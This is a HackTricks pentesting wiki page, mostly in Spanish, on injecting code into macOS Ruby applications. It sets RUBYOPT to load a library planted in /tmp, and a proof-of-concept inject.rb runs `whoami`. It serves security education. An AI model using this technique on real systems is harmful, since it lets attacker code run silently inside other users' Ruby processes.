macOS Ruby Applications Injection

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

RUBYOPT

Usando esta variable de entorno es posible agregar nuevos parámetros a ruby cada vez que se ejecuta. Aunque el parámetro -e no se puede usar para especificar código ruby a ejecutar, es posible usar los parámetros -I y -r para agregar una nueva carpeta a la ruta de carga de bibliotecas y luego especificar una biblioteca para cargar.

Crea la biblioteca inject.rb en /tmp:

inject.rb

puts `whoami`

Crea un script de ruby en cualquier lugar como:

hello.rb

puts 'Hello, World!'

Luego, haz que un script ruby arbitrario lo cargue con:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Dato curioso, funciona incluso con el parámetro --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE)

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

PreviousmacOS Python Applications Injection NextmacOS .Net Applications Injection

Last updated 1 month ago